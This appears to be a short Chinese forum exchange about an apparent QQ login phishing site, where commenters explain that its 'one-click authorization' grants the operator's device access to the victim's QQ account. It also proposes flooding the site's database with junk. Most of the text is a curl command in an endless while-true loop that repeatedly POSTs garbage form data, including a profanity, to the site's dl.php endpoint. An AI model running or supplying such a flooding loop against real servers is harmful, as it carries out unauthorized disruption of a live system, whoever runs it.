https://385950493.qun666.cn/?uid=wFmMyKpB&s=
post提交,应该可以直接炸数据库的。。。
gaoyuyu post提交,应该可以直接炸数据库的。。。
他那个一键授权,是授权他的设备登录QQ
while true; do curl 'https://385950493.qun666.cn/dl.php?l=1' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: Hm_lvt_bf1fa0cb16706ec683085993a52d7532=1684544917; Hm_lpvt_bf1fa0cb16706ec683085993a52d7532=1684544917' \ -H 'Origin: https://385950493.qun666.cn' \ -H 'Referer: https://385950493.qun666.cn/' \ -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ --data-raw '{"l":"dl","q":"75972395","uid":"","aa":"","id":"","m":"fuckyou"}' \ --compressed done